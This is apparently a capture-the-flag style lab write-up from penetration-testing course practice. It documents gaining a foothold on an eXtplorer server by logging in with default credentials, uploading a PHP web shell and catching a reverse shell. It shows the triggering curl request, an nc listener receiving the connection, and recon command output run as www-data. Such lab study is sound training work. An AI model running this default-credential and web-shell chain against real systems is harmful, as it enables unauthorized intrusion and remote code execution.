PHP Shell
The target eXtplorer instance was found to be using default credentials, allowing unauthorized access to the administrative panel. Due to the application’s functionality, it is possible to upload a PHP web shell, resulting in remote code execution on the target system.
/Practice/Extplorer/3-Exploitation/attachments/{54D5486C-C727-4428-B1A2-C245CC9F2111}.png)
/Practice/Extplorer/3-Exploitation/attachments/Pasted-image-20250326105555.png)
Uploading the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/extplorer]
└─$ curl -s http://$IP/shell.phpInvoking the reverse shell
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/extplorer]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.111.16] 48686
SOCKET: Shell has connected! PID: 3012
whoami
www-data
hostname
dora
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:4d:ee brd ff:ff:ff:ff:ff:ff
inet 192.168.111.16/24 brd 192.168.111.255 scope global ens160
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the www-data account via arbitrary file upload to RCE